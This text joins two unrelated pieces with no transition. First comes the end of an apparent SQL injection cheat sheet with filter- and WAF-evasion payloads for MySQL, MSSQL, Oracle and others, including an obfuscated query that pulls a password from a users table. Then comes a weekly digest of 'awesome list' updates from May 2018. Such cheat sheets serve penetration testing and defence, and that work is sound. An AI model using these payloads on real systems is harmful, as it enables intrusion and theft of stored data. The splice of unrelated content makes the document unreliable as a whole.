| DBMS | ASCII characters in hexadicimal |
| ---- | ------------------------------- |
| SQLite3 | 0A, 0D, 0C, 09, 20 |
| MySQL 5 | 09, 0A, 0B, 0C, 0D, A0, 20 |
| MySQL 3 | 01, 02, 03, 04, 05, 06, 07, 08, 09, 0A, 0B, 0C, 0D, 0E, 0F, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 1A, 1B, 1C, 1D, 1E, 1F, 20, 7F, 80, 81, 88, 8D, 8F, 90, 98, 9D, A0 |
| PostgreSQL | 0A, 0D, 0C, 09, 20 |
| Oracle 11g | 00, 0A, 0D, 0C, 09, 20 |
| MSSQL | 01, 02, 03, 04, 05, 06, 07, 08, 09, 0A, 0B, 0C, 0D, 0E, 0F, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 1A, 1B, 1C, 1D, 1E, 1F, 20 |
Example of query where spaces were replaced by ascii characters above 0x80
```
♀SELECT§*⌂FROM☺users♫WHERE♂1☼=¶1‼
```
### No Comma
Bypass using OFFSET, FROM and JOIN
```sql
LIMIT 0,1 -> LIMIT 1 OFFSET 0
SUBSTR('SQL',1,1) -> SUBSTR('SQL' FROM 1 FOR 1).
SELECT 1,2,3,4 -> UNION SELECT * FROM (SELECT 1)a JOIN (SELECT 2)b JOIN (SELECT 3)c JOIN (SELECT 4)d
```
### No Equal
Bypass using LIKE/NOT IN/IN/BETWEEN
```sql
?id=1 and substring(version(),1,1)like(5)
?id=1 and substring(version(),1,1)not in(4,3)
?id=1 and substring(version(),1,1)in(4,3)
?id=1 and substring(version(),1,1) between 3 and 4
```
### Case modification
Bypass using uppercase/lowercase (see keyword AND)
```sql
?id=1 AND 1=1#
?id=1 AnD 1=1#
?id=1 aNd 1=1#
```
Bypass using keywords case insensitive / Bypass using an equivalent operator
```sql
AND -> &&
OR -> ||
= -> LIKE,REGEXP, BETWEEN, not < and not >
> X -> not between 0 and X
WHERE -> HAVING
```
### Obfuscation by DBMS
MySQL
```
1.UNION SELECT 2
3.2UNION SELECT 2
1e0UNION SELECT 2
SELECT\N/0.e3UNION SELECT 2
1e1AND-0.0UNION SELECT 2
1/*!12345UNION/*!31337SELECT/*!table_name*/
{ts 1}UNION SELECT.`` 1.e.table_name
SELECT $.`` 1.e.table_name
SELECT{_ .``1.e.table_name}
SELECT LightOS . ``1.e.table_name LightOS
SELECT information_schema 1337.e.tables 13.37e.table_name
SELECT 1 from information_schema 9.e.table_name
```
MSSQL
```
.1UNION SELECT 2
1.UNION SELECT.2alias
1e0UNION SELECT 2
1e1AND-1=0.0UNION SELECT 2
SELECT 0xUNION SELECT 2
SELECT\UNION SELECT 2
\1UNION SELECT 2
SELECT 1FROM[table]WHERE\1=\1AND\1=\1
SELECT"table_name"FROM[information_schema].[tables]
```
Oracle
```
1FUNION SELECT 2
1DUNION SELECT 2
SELECT 0x7461626c655f6e616d65 FROM all_tab_tables
SELECT CHR(116) || CHR(97) || CHR(98) FROM all_tab_tables
SELECT%00table_name%00FROM%00all_tab_tables
```
### More MySQL specific
`information_schema.tables` alternative
```sql
select * from mysql.innodb_table_stats;
+----------------+-----------------------+---------------------+--------+----------------------+--------------------------+
| database_name | table_name | last_update | n_rows | clustered_index_size | sum_of_other_index_sizes |
+----------------+-----------------------+---------------------+--------+----------------------+--------------------------+
| dvwa | guestbook | 2017-01-19 21:02:57 | 0 | 1 | 0 |
| dvwa | users | 2017-01-19 21:03:07 | 5 | 1 | 0 |
...
+----------------+-----------------------+---------------------+--------+----------------------+--------------------------+
mysql> show tables in dvwa;
+----------------+
| Tables_in_dvwa |
+----------------+
| guestbook |
| users |
+----------------+
```
Version Alternative
```sql
mysql> select @@innodb_version;
+------------------+
| @@innodb_version |
+------------------+
| 5.6.31 |
+------------------+
mysql> select @@version;
+-------------------------+
| @@version |
+-------------------------+
| 5.6.31-0ubuntu0.15.10.1 |
+-------------------------+
mysql> mysql> select version();
+-------------------------+
| version() |
+-------------------------+
| 5.6.31-0ubuntu0.15.10.1 |
+-------------------------+
```
#### WAF bypass for MySQL using scientific notation
Blocked
```sql
' or ''='
```
Working
```sql
' or 1.e('')='
```
Obfuscated query
```sql
1.e(ascii 1.e(substring(1.e(select password from users limit 1 1.e,1 1.e) 1.e,1 1.e,1 1.e)1.e)1.e) = 70 or'1'='2
```
## References
* Detect SQLi
* [Manual SQL Injection Discovery Tips](https://gerbenjavado.com/manual-sql-injection-discovery-tips/)
* [NetSPI SQL Injection Wiki](https://sqlwiki.netspi.com/)
* MySQL:
* [PentestMonkey's mySQL injection cheat sheet](http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet)
* [Reiners mySQL injection Filter Evasion Cheatsheet](https://websec.wordpress.com/2010/12/04/sqli-filter-evasion-cheat-sheet-mysql/)
* [Alternative for Information_Schema.Tables in MySQL](https://osandamalith.com/2017/02/03/alternative-for-information_schema-tables-in-mysql/)
* [The SQL Injection Knowledge base](https://websec.ca/kb/sql_injection)
* MSSQL:
* [EvilSQL's Error/Union/Blind MSSQL Cheatsheet](http://evilsql.com/main/page2.php)
* [PentestMonkey's MSSQL SQLi injection Cheat Sheet](http://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet)
* ORACLE:
* [PentestMonkey's Oracle SQLi Cheatsheet](http://pentestmonkey.net/cheat-sheet/sql-injection/oracle-sql-injection-cheat-sheet)
* POSTGRESQL:
* [PentestMonkey's Postgres SQLi Cheatsheet](http://pentestmonkey.net/cheat-sheet/sql-injection/postgres-sql-injection-cheat-sheet)
* Others
* [SQLi Cheatsheet - NetSparker](https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/)
* [Access SQLi Cheatsheet](http://nibblesec.org/files/MSAccessSQLi/MSAccessSQLi.html)
* [PentestMonkey's Ingres SQL Injection Cheat Sheet](http://pentestmonkey.net/cheat-sheet/sql-injection/ingres-sql-injection-cheat-sheet)
* [Pentestmonkey's DB2 SQL Injection Cheat Sheet](http://pentestmonkey.net/cheat-sheet/sql-injection/db2-sql-injection-cheat-sheet)
* [Pentestmonkey's Informix SQL Injection Cheat Sheet](http://pentestmonkey.net/cheat-sheet/sql-injection/informix-sql-injection-cheat-sheet)
* [SQLite3 Injection Cheat sheet](https://sites.google.com/site/0x7674/home/sqlite3injectioncheatsheet)
* [Ruby on Rails (Active Record) SQL Injection Guide](http://rails-sqli.org/)
* [ForkBombers SQLMap Tamper Scripts Update](http://www.forkbombers.com/2016/07/sqlmap-tamper-scripts-update.html)
* [SQLi in INSERT worse than SELECT](https://labs.detectify.com/2017/02/14/sqli-in-insert-worse-than-select/)
* [Manual SQL Injection Tips](https://gerbenjavado.com/manual-sql-injection-discovery-tips/)
* Second Order:
* [Analyzing CVE-2018-6376 – Joomla!, Second Order SQL Injection](https://www.notsosecure.com/analyzing-cve-2018-6376/)
* [Exploiting Second Order SQLi Flaws by using Burp & Custom Sqlmap Tamper](https://pentest.blog/exploiting-second-order-sqli-flaws-by-using-burp-custom-sqlmap-tamper/)
* Sqlmap:
* [#SQLmap protip @zh4ck](https://twitter.com/zh4ck/status/972441560875970560)
* WAF:
* [SQLi Optimization and Obfuscation Techniques](https://paper.bobylive.com/Meeting_Papers/BlackHat/USA-2013/US-13-Salgado-SQLi-Optimization-and-Obfuscation-Techniques-Slides.pdf) by Roberto Salgado
* [A Scientific Notation Bug in MySQL left AWS WAF Clients Vulnerable to SQL Injection](https://www.gosecure.net/blog/2021/10/19/a-scientific-notation-bug-in-mysql-left-aws-waf-clients-vulnerable-to-sql-injection/)
|
# Awesome List Updates on May 07 - May 13, 2018
40 awesome lists updated this week.
[🏠 Home](/README.md) · [🔍 Search](https://www.trackawesomelist.com/search/) · [🔥 Feed](https://www.trackawesomelist.com/week/rss.xml) · [📮 Subscribe](https://trackawesomelist.us17.list-manage.com/subscribe?u=d2f0117aa829c83a63ec63c2f&id=36a103854c) · [❤️ Sponsor](https://github.com/sponsors/theowenyoung)
## [1. Awesome Android](/content/JStumpp/awesome-android/week/README.md)
### Kotlin / Custom Dialog
* [Koin](https://insert-koin.io/) - Lightweight dependency injection framework for Kotlin
## [2. Awesome Serverless](/content/pmuens/awesome-serverless/week/README.md)
### Projects
* [Official joke API (⭐635)](https://github.com/15Dkatz/official_joke_api) - Vue Jokester application backend.
* [Event Gateway Getting Started (⭐48)](https://github.com/serverless/event-gateway-getting-started) - Walkthrough application for using the Event Gateway.
## [3. Awesome Decentralized](/content/croqaz/awesome-decentralized/week/README.md)
### Applications
* [LCVPN (⭐512)](https://github.com/kanocz/lcvpn): Light decentralized VPN in golang.
* [Meshbird (⭐3.5k)](https://github.com/meshbird/meshbird): Meshbird enables distributed private networking across geographically dispersed datacenters.
* [nuTorrent ☠️ (⭐231)](https://github.com/LeeChSien/nuTorrent): A Pure Javascript BitTorrent Client. Built with Electron and React.
## [4. Awesome Mobile Web Development](/content/myshov/awesome-mobile-web-development/week/README.md)
### Books
* [Mobile Design Pattern Gallery: UI Patterns for Smartphone Apps](https://www.amazon.com/Mobile-Design-Pattern-Gallery-Smartphone/dp/1449363636) - UI patterns which can be useful for mobile web apps.
### Other Useful Tools and Libraries
* [Workbox](https://developers.google.com/web/tools/workbox/) - JavaScript libraries for adding offline support to web apps.
## [5. Tools](/content/lvwzhen/tools/week/README.md)
### Pagespeed
* [GTmetrix](https://gtmetrix.com/)
## [6. Awesome Deep Learning Resources](/content/guillaume-chevalier/Awesome-Deep-Learning-Resources/week/README.md)
### Books
* [Neural Networks and Deep Learning](http://neuralnetworksanddeeplearning.com/index.html) - This book covers many of the core concepts behind neural networks and deep learning.
### Papers / Recurrent Neural Networks
* [Neural Machine Translation and Sequence-to-sequence Models: A Tutorial](https://arxiv.org/pdf/1703.01619.pdf) - Interesting overview of the subject of NMT, I mostly read part 8 about RNNs with attention as a refresher.
* [Adaptive Computation Time for Recurrent Neural Networks](https://arxiv.org/pdf/1603.08983v4.pdf) - Let RNNs decide how long they compute. I would love to see how well would it combines to Neural Turing Machines. Interesting interactive visualizations on the subject can be found [here](http://distill.pub/2016/augmented-rnns/).
### Papers / Convolutional Neural Networks
* [U-Net: Convolutional Networks for Biomedical Image Segmentation](https://arxiv.org/pdf/1505.04597.pdf) - The U-Net is an encoder-decoder CNN that also has skip-connections, good for image segmentation at a per-pixel level.
* [The One Hundred Layers Tiramisu: Fully Convolutional DenseNets for Semantic Segmentation](https://arxiv.org/pdf/1611.09326.pdf) - Merges the ideas of the U-Net and the DenseNet, this new neural network is especially good for huge datasets in image segmentation.
* [Prototypical Networks for Few-shot Learning](https://arxiv.org/pdf/1703.05175.pdf) - Use a distance metric in the loss to determine to which class does an object belongs to from a few examples.
### Papers / Attention Mechanisms
* [Neural Machine Translation by Jointly Learning to Align and Translate](https://arxiv.org/pdf/1409.0473.pdf) - Attention mechanism for LSTMs! Mostly, figures and formulas and their explanations revealed to be useful to me. I gave a talk on that paper [here](https://www.youtube.com/watch?v=QuvRWevJMZ4).
* [Neural Turing Machines](https://arxiv.org/pdf/1410.5401v2.pdf) - Outstanding for letting a neural network learn an algorithm with seemingly good generalization over long time dependencies. Sequences recall problem.
* [Show, Attend and Tell: Neural Image Caption Generation with Visual Attention](https://arxiv.org/pdf/1502.03044.pdf) - LSTMs' attention mechanisms on CNNs feature maps does wonders.
* [Teaching Machines to Read and Comprehend](https://arxiv.org/pdf/1506.03340v3.pdf) - A very interesting and creative work about textual question answering, what a breakthrough, there is something to do with that.
* [Effective Approaches to Attention-based Neural Machine Translation](https://arxiv.org/pdf/1508.04025.pdf) - Exploring different approaches to attention mechanisms.
* [Matching Networks for One Shot Learning](https://arxiv.org/pdf/1606.04080.pdf) - Interesting way of doing one-shot learning with low-data by using an attention mechanism and a query to compare an image to other images for classification.
* [Google’s Neural Machine Translation System: Bridging the Gap between Human and Machine Translation](https://arxiv.org/pdf/1609.08144.pdf) - In 2016: stacked residual LSTMs with attention mechanisms on encoder/decoder are the best for NMT (Neural Machine Translation).
* [Hybrid computing using a neural network with dynamic external memory](http://www.nature.com/articles/nature20101.epdf?author_access_token=ImTXBI8aWbYxYQ51Plys8NRgN0jAjWel9jnR3ZoTv0MggmpDmwljGswxVdeocYSurJ3hxupzWuRNeGvvXnoO8o4jTJcnAyhGuZzXJ1GEaD-Z7E6X_a9R-xqJ9TfJWBqz) - Improvements on differentiable memory based on NTMs: now it is the Differentiable Neural Computer (DNC).
* [Massive Exploration of Neural Machine Translation Architectures](https://arxiv.org/pdf/1703.03906.pdf) - That yields intuition about the boundaries of what works for doing NMT within a framed seq2seq problem formulation.
* [Natural TTS Synthesis by Conditioning WaveNet on Mel Spectrogram
Predictions](https://arxiv.org/pdf/1712.05884.pdf) - A [WaveNet](https://arxiv.org/pdf/1609.03499v2.pdf) used as a vocoder can be conditioned on generated Mel Spectrograms from the Tacotron 2 LSTM neural network with attention to generate neat audio from text.
## [7. Awesome Courses](/content/prakhar1989/awesome-courses/week/README.md)
### Courses / Machine Learning
* [CS 189](http://www.eecs189.org/) **Introduction To Machine Learning** *UC Berkeley* <img src="https://assets-cdn.github.com/images/icons/emoji/unicode/1f4bb.png" width="20" height="20" alt="Assignments" title="Assignments" /> <img src="https://assets-cdn.github.com/images/icons/emoji/unicode/1f4dd.png" width="20" height="20" alt="Lecture Notes" title="Lecture Notes" />
* Introductory ML course covering a wide range of topics: ranging from least squares to convolutional neural networks
* [Notes](http://www.eecs189.org/)
* [Homework](http://www.eecs189.org/)
## [8. Awesome Preact](/content/preactjs/awesome-preact/week/README.md)
### Contents / Components
* [Pimg (⭐100)](https://github.com/ooade/pimg) - Progressive Image Component; Used for lazy loading images.
## [9. Awesome Jamstack](/content/automata/awesome-jamstack/week/README.md)
### Tutorials / Articles / Automation
* [Handling Static Forms, Auth & Serverless Functions with Gatsby on Netlify](https://snipcart.com/blog/static-forms-serverless-gatsby-netlify)
## [10. Awesome](/content/Awesome-Windows/Awesome/week/README.md)
### Games
* [LuaStudio](http://scormpool.com/luastudio) - Free game development tool/engine. Create games and other graphic focused apps on Windows using Lua/LuaJIT programming language. Export them to many platforms including iOS, Android and Mac.
## [11. Awesome Elixir](/content/h4cc/awesome-elixir/week/README.md)
### Cloud Infrastructure and Management
* [Kazan (⭐136)](https://github.com/obmarg/kazan) - Kubernetes client for Elixir, generated from the k8s open API specifications.
### Date and Time
* [cocktail (⭐178)](https://github.com/peek-travel/cocktail) - Elixir date recurrence library based on iCalendar events.
### Examples and funny stuff
* [feedx (⭐11)](https://github.com/erneestoc/feedx) - Add social feed functionality to current applications. Exemplify OTP umbrella app, with 3 apps. Thin phoenix controllers.
### Framework Components
* [plug\_canonical\_host (⭐32)](https://github.com/remiprev/plug_canonical_host) - Plug to ensure all requests are served from a single canonical host.
### HTML
* [tidy\_ex (⭐9)](https://github.com/f34nk/tidy_ex) - Elixir binding to the granddaddy of HTML tools <http://www.html-tidy.org>.
### Queue
* [gen\_rmq (⭐178)](https://github.com/meltwater/gen_rmq) - Set of behaviours meant to be used to create RabbitMQ consumers and publishers.
### Security
* [pwned (⭐21)](https://github.com/thiamsantos/pwned) - Check if your password has been pwned.
### Testing
* [mockingbird (⭐3)](https://github.com/Driftrock/mockingbird) - A set of helpers to test code that involves http requests.
### Third Party APIs
* [shopify (⭐94)](https://github.com/nsweeting/shopify) - Easily access the Shopify API.
### Translations and Internationalizations
* [getatrex (⭐6)](https://github.com/alexfilatov/getatrex) - Automatic translation tool of Gettext locales with Google Translate for Elixir/Phoenix projects.
## [12. Awesome C](/content/inputsh/awesome-c/week/README.md)
### Compilers
* [CompCert](http://compcert.inria.fr/) - Fully-verified C compiler. Supports almost all of C89. [`GNU GPL2.1 or later`](http://www.gnu.org/licenses/old-licenses/gpl-2.0.html)
* [Intel SPMD](http://ispc.github.io/) - Compiler for a variant of the C language, for single program, multiple data programming. [`Various licenses`](https://github.com/ispc/ispc/blob/master/LICENSE.txt)
### Compression
* [lz4](https://lz4.github.io/lz4/) - Fast Compression algorithm.
* [quicklz](http://www.quicklz.com/index.php) - Fast compression library. [`GNU GPL2.1`](http://www.gnu.org/licenses/old-licenses/gpl-2.0.html)
### Crypto
* [libgcrypt](https://gnupg.org/related_software/libgcrypt/) - General-purpose cryptography library, with a range of available ciphers. [`GNU LGPL2.1or later (code)`](http://www.gnu.org/licenses/old-licenses/lgpl-2.1.html) and [`GNU GPL2.1 or later (manual and tools)`](http://www.gnu.org/licenses/old-licenses/gpl-2.0.html)
* [libsodium](https://download.libsodium.org/doc/) - Modern and easy-to-use crypto library. [`Expat`](https://directory.fsf.org/wiki/License:Expat)
* [libtomcrypt](https://www.libtom.net/) - Fairly comprehensive, modular and portable cryptographic toolkit. [`Public Domain`](https://creativecommons.org/share-your-work/public-domain/)
### Database
* [sophia](http://sophia.systems/) - Modern, embeddable key-value database. [`FreeBSD`](https://directory.fsf.org/wiki?title=License:FreeBSD)
### Editors
* [Qt Creator](https://www.qt.io/qt-features-libraries-apis-tools-and-ide/#ide) - Cross-platform IDE written with C++ and Qt, part of the Qt SDK. Supports Clang Code Model. [`GNU GPL3 with Qt exception`](https://github.com/qt-creator/qt-creator/blob/master/LICENSE.GPL3-EXCEPT)
### RTOS
* [Amazon FreeRTOS](https://aws.amazon.com/freertos/) - RTOS for microcontrollers that makes small, low-power edge devices easy to program. [`MIT`](https://github.com/aws/amazon-freertos/blob/master/LICENSE)
* [Contiki](http://www.contiki-os.org/) - Connect low-cost, low power microcontrollers to the Internet. [`3-clause BSD`](https://github.com/contiki-os/contiki/blob/master/LICENSE)
### Frameworks
* [C Algorithms](https://fragglet.github.io/c-algorithms/) - Collection of common algorithms and data structures for C. [`ISC`](https://directory.fsf.org/wiki/License:ISC)
* [EFL](https://www.enlightenment.org/) - Large collection of useful data structures and functions.
* [qlibc](http://wolkykim.github.io/qlibc/) - Simple and powerful C library, designed as a replacement for GLib while focusing on being small and light. [`qLib license`](https://github.com/wolkykim/qlibc/blob/master/LICENSE) (similar to [`FreeBSD`](https://directory.fsf.org/wiki?title=License:FreeBSD))
### Engines
* [ioquake3](https://ioquake3.org/) - The Quake3 engine, freed at last. [`GNU GPL2.1`](http://www.gnu.org/licenses/old-licenses/gpl-2.0.html)
* [Orx](http://orx-project.org/) - Portable, lightweight, plugin-based, data-driven, 2D-oriented game engine. [`zlib`](https://directory.fsf.org/wiki/License:Zlib)
### Resources
* [Chipmunk2D](http://chipmunk-physics.net/) - Fast and lightweight 2D game physics library. [`Expat`](https://directory.fsf.org/wiki/License:Expat)
* [FreeGLUT](http://freeglut.sourceforge.net/) - Alternative to the OpenGL Utility Toolkit. Allows the creation and management of windows with OpenGL contexts. [`X11`](https://directory.fsf.org/wiki/License:X11)
* [libao](https://xiph.org/ao/) - Cross-platform audio library with a wide variety of outputs. [`GNU GPL2.1 or later`](http://www.gnu.org/licenses/old-licenses/gpl-2.0.html)
* [SDL and SDL2](https://www.libsdl.org/) - Cross-platform development library designed to provide low-level access to audio, keyboard, mouse, joystick and graphics hardware via OpenGL. SDL2 is the most current version. [`zlib`](https://directory.fsf.org/wiki/License:Zlib)
### Generic Programming
* [klib](http://attractivechaos.github.io/klib/#About) - Small and lightweight implementations of common algorithms and data structures. [`MIT`](https://en.wikipedia.org/wiki/MIT_License)
### JSON
* [WJElement (⭐101)](https://github.com/netmail-open/wjelement/wiki) - Advanced JSON manipulation library, with support for JSON Schema. [`LGPL, any version`](https://github.com/netmail-open/wjelement/)
### Memory Allocators / Language Standards
* [jemalloc](http://jemalloc.net/) - General purpose malloc(3) implementation that emphasizes fragmentation avoidance and scalable concurrency support, commonly used in production systems. [`FreeBSD`](https://directory.fsf.org/wiki?title=License:FreeBSD)
### Multimedia / Language Standards
* [libmpv](https://mpv.io/) - Music-playing library. Compile with `./waf configure --disable-cplayer --enable-libmpv-shared` to not have the music player. [`GNU GPL2.1 or later`](http://www.gnu.org/licenses/old-licenses/gpl-2.0.html)
* [libsoundio](http://libsound.io/) - Library for cross-platform, real-time audio input and output. Has a range of back-ends. [`Expat`](https://directory.fsf.org/wiki/License:Expat)
### Networking and Internet / Language Standards
* [czmq](http://czmq.zeromq.org/) - High-level binding for ZeroMQ. [`MPL2.0`](https://www.gnu.org/licenses/license-list.html#MPL-2.0)
* [libuv](http://libuv.org/) - Cross-platform asynchronous I/O. [`Expat`](https://directory.fsf.org/wiki/License:Expat)
* [lwan](https://lwan.ws/) - Experimental, scalable, high-performance HTTP server. [`GNU GPL2.1`](http://www.gnu.org/licenses/old-licenses/gpl-2.0.html)
* [mongoose](https://cesanta.com/) - Embedded web server for C. [`GNU GPL2.1`](http://www.gnu.org/licenses/old-licenses/gpl-2.0.html)
### Web Frameworks / Language Standards
* [balde](https://balde.rgm.io/) - Microframework for C based on GLib. [`GNU LGPLv2.1`](http://www.gnu.org/licenses/old-licenses/lgpl-2.1.html)
* [kore](https://kore.io/) - Easy to use, scalable and secure web application framework for writing web APIs in C.
* [klone](http://www.koanlogic.com/klone/) - KLone is a fully-featured, multiplatform, web application development framework.
### Numerical / Language Standards
* [apophenia](http://apophenia.info/) - Library for statistical and scientific computing. [`GNU GPL2.1`](http://www.gnu.org/licenses/old-licenses/gpl-2.0.html)
### Parallel Programming / Language Standards
* [ck](http://concurrencykit.org/) - Concurrency primitives, safe memory reclamation mechanisms and non-blocking data structures. [`FreeBSD`](https://directory.fsf.org/wiki?title=License:FreeBSD)
* [libdill](http://libdill.org/) - Structured concurrency in C. [`X11`](https://directory.fsf.org/wiki/License:X11)
### String Manipulation / Language Standards
* [shoco](http://ed-von-schleck.github.io/shoco/) - Compressor for small text strings. [`Expat`](https://directory.fsf.org/wiki/License:Expat)
### Testing / Language Standards
* [CHEAT](http://users.jyu.fi/\~sapekiis/cheat/) - Very simple unit testing framework. [`FreeBSD`](https://directory.fsf.org/wiki?title=License:FreeBSD)
* [CMock](http://www.throwtheswitch.org/) - Mock/stub generator for C. [`Expat`](https://directory.fsf.org/wiki/License:Expat)
* [Unity](http://www.throwtheswitch.org/) - Simple unit testing framework for C. [`Expat`](https://directory.fsf.org/wiki/License:Expat)
### Tools / Language Standards
* [rr](https://rr-project.org/) - Debugger that records non-deterministic executions to allow for deterministic debugging. [`FreeBSD`](https://directory.fsf.org/wiki?title=License:FreeBSD)
### Utilities / Language Standards
* [libusb](https://libusb.info/) - Generic access to USB devices. [`LGPL2.1`](https://github.com/libusb/libusb/blob/master/COPYING)
## [13. Awesome PICO 8](/content/pico-8/awesome-PICO-8/week/README.md)
### Contents / Tools
* [MIDI to PICO-8 (⭐57)](https://github.com/andmatand/midi-to-pico8) - A tool to convert MIDI files to PICO-8 music.
## [14. Awesome Hacking](/content/carpedm20/awesome-hacking/week/README.md)
### Tools / Other
* [Autopsy](http://www.sleuthkit.org/autopsy/) - A digital forensics platform and graphical interface to [The Sleuth Kit](http://www.sleuthkit.org/sleuthkit/index.php) and other digital forensics tools
### Bug bounty / Other
* [Awesome bug bounty resources by EdOverflow (⭐4.5k)](https://github.com/EdOverflow/bugbounty-cheatsheet)
### General / Other
* [Movies For Hackers (⭐9.3k)](https://github.com/k4m4/movies-for-hackers) - A curated list of movies every hacker & cyberpunk must watch.
## [15. Awesome Free Software](/content/johnjago/awesome-free-software/week/README.md)
### Resources / Organizations
* [Free Software Movement Karnataka](https://fsmk.org/) - Group in Bengaluru, India that spreads awareness about free software.
* [Free Software Movement of India](http://fsmi.in/) - Coalition of free software organizations in India.
### Resources / Other Lists
* [Awesome Humane Tech (⭐2.8k)](https://github.com/engagingspaces/awesome-humane-tech) - List of projects focusing on ethics, transparency, and privacy.
## [16. Awesome No Login Web Apps](/content/aviaryan/awesome-no-login-web-apps/week/README.md)
### Programming Tools / Others
* [jsonstore.io](https://www.jsonstore.io/) - jsonstore.io offers free, secured JSON based API endpoints for small projects. It supports common types of HTTP operations like POST, GET, PUT, DELETE etc.
### Text based tools / Others
* [Write.as](https://write.as/) - Cross-platform writing and publishing tool that supports Markdown and editing / deleting past posts.
## [17. Awesome Crystal](/content/veelenga/awesome-crystal/week/README.md)
### System
* [baked\_file\_system (⭐170)](https://github.com/schovi/baked_file_system) - Virtual file system implementation
* [hardware (⭐71)](https://github.com/crystal-community/hardware) - Get CPU, Memory and Network informations of the running OS and its processes
## [18. Awesome Remote Job](/content/lukasz-madon/awesome-remote-job/week/README.md)
### Tools / Communication
* [Slack](https://slack.com/) – Text, voice, and video chat system with loads of integration options including [ScreenHero](https://screenhero.com), a real-time, HD screen sharing system for collaboration in teams
## [19. Awesome Influxdb](/content/mark-rushakoff/awesome-influxdb/week/README.md)
### Plugins / Hooks
* [sensu-plugins-influxdb (⭐18)](https://github.com/sensu-plugins/sensu-plugins-influxdb) - [Sensu](https://sensu.io/) InfluxDB Plugins
### Awesome lists that include links to InfluxDB / Hooks
* [awesome-microservices (⭐11k)](https://github.com/mfornos/awesome-microservices)
## [20. Awesome Opengl](/content/eug/awesome-opengl/week/README.md)
### Debug
* [CodeXL (⭐974)](https://github.com/GPUOpen-Tools/CodeXL) - AMD's tool suite that includes debugger, profiler and frame/shader analysis.
### Libraries
* [assimp (⭐8.3k)](https://github.com/assimp/assimp) - Portable library to import 3D models in a uniform manner.
### Videos
* [TheChernoProject](https://www.youtube.com/playlist?list=PLlrATfBNZ98foTJPJ_Ev03o2oq3-GGOS2) - Introduction to OpenGL in C++
## [21. Awesome Network Analysis](/content/briatte/awesome-network-analysis/week/README.md)
### Review Articles / Archeological and Historical Networks
* [Graph Theory and Networks in Biology](https://doi.org/10.1049/iet-syb:20060038) ([preprint](https://arxiv.org/abs/q-bio/0604006); *IET Systems Biology*, 2007).
## [22. Awesome Aws](/content/donnemartin/awesome-aws/week/README.md)
### Open Source Repos / Elastic Beanstalk
* [eb-demo-php-simple-app :fire: (⭐142)](https://github.com/awslabs/eb-demo-php-simple-app) - Simple PHP app.
### Open Source Repos / Elastic MapReduce
* [emr-bootstrap-actions :fire::fire::fire: (⭐612)](https://github.com/awslabs/emr-bootstrap-actions) - Sample bootstrap actions.
## [23. Awesome Malware Analysis](/content/rshipp/awesome-malware-analysis/week/README.md)
### Open Source Threat Intelligence / Tools
* [MalPipe (⭐94)](https://github.com/silascutler/MalPipe) - Malware/IOC ingestion and
processing engine, that enriches collected data.
## [24. Awesome Shell](/content/alebcay/awesome-shell/week/README.md)
### Applications / Directory Navigation
* [gcalcli (⭐2.9k)](https://github.com/insanum/gcalcli) - Google Calendar command line interface
## [25. Awesome Vue](/content/vuejs/awesome-vue/week/README.md)
### Components & Libraries / UI Components
* [vue-persian-datetime-picker (⭐561)](https://github.com/talkhabi/vue-persian-datetime-picker) Persian material datepicker. Supports datetime, date, time, year, month.
### Components & Libraries / UI Utilities
* [vue-next-level-scroll (⭐49)](https://github.com/Developmint/vue-next-level-scroll) - A component based and SSR ready approach to smooth scrolling using the modern Scroll behavior API
### Components & Libraries / Utilities
* [vue-router-user-roles (⭐241)](https://github.com/anthonygore/vue-router-user-roles) - Protects routes based on user roles. Add your own authentication.
## [26. Awesome Cheminformatics](/content/hsiaoyi0504/awesome-cheminformatics/week/README.md)
### Libraries / General Purpose
* [CDK (Chemistry Development Kit)](https://sourceforge.net/projects/cdk/) - Algorithms for structural chemo- and bioinformatics, implemented in Java.
### Libraries / Visualization
* [JChemPaint (⭐92)](https://github.com/JChemPaint/jchempaint) - Chemical 2D structure editor application/applet based on the [Chemistry Development Kit](https://sourceforge.net/projects/cdk/).
## [27. Awesome Ember](/content/ember-community-russia/awesome-ember/week/README.md)
### Packages / Automation
* [ember-cli-dependency-lint (⭐79)](https://github.com/salsify/ember-cli-dependency-lint) - Lint your app's addon dependencies, making sure you only have one version of each.
### Packages / End-user customization
* [ember-wormhole (⭐287)](https://github.com/yapplabs/ember-wormhole) - Render a child view somewhere else in the DOM.
### Packages / Helpers
* [ember-root-url (⭐11)](https://github.com/ef4/ember-root-url) - A template helper to keep your URLs relative to the app's rootURL.
* [ember-cli-string-helpers (⭐72)](https://github.com/romulomachado/ember-cli-string-helpers) - Set of the String helpers extracted from DockYard's ember-composable-helpers.
### Packages / Articles
* [A collection of links that summarize EmberConf 2017 (⭐99)](https://github.com/poteto/emberconf-2017)
* [A collection of links that summarize EmberConf 2016 (⭐269)](https://github.com/poteto/emberconf-2016)
* [A collection of links that summarize EmberConf 2015 (⭐245)](https://github.com/poteto/emberconf-2015)
### Packages / Styleguides
* [ember-styleguide (⭐76)](https://github.com/ember-learn/ember-styleguide)
* [Softlayer Ember.js (⭐40)](https://github.com/softlayer/ember-style-guide)
* [Netguru Ember.js](https://github.com/netguru/ember-styleguide)
* [DockYard Ember.js](https://github.com/DockYard/styleguides/blob/master/engineering/ember.md)
### Packages / Videos
* [Developing ember apps on glitch.com](https://www.youtube.com/watch?v=uhXA6ECaknw)
## [28. Awesome Laravel](/content/chiraggude/awesome-laravel/week/README.md)
### Conferences / Third-party Service Integration
* [Laravel Live UK](https://laravellive.uk/)
## [29. Awesome Machine Learning](/content/josephmisiti/awesome-machine-learning/week/README.md)
### JavaScript / General-Purpose Machine Learning
* [TensorFlow.js](https://js.tensorflow.org/) - A WebGL accelerated, browser based JavaScript library for training and deploying ML models.
### .NET / General-Purpose Machine Learning
* [GeneticSharp (⭐1.1k)](https://github.com/giacomelli/GeneticSharp) - Multi-platform genetic algorithm library for .NET Core and .NET Framework. The library has several implementations of GA operators, like: selection, crossover, mutation, reinsertion and termination.
* [ML.NET (⭐8.4k)](https://github.com/dotnet/machinelearning) - ML.NET is a cross-platform open-source machine learning framework which makes machine learning accessible to .NET developers. ML.NET was originally developed in Microsoft Research and evolved into a significant framework over the last decade and is used across many product groups in Microsoft like Windows, Bing, PowerPoint, Excel and more.
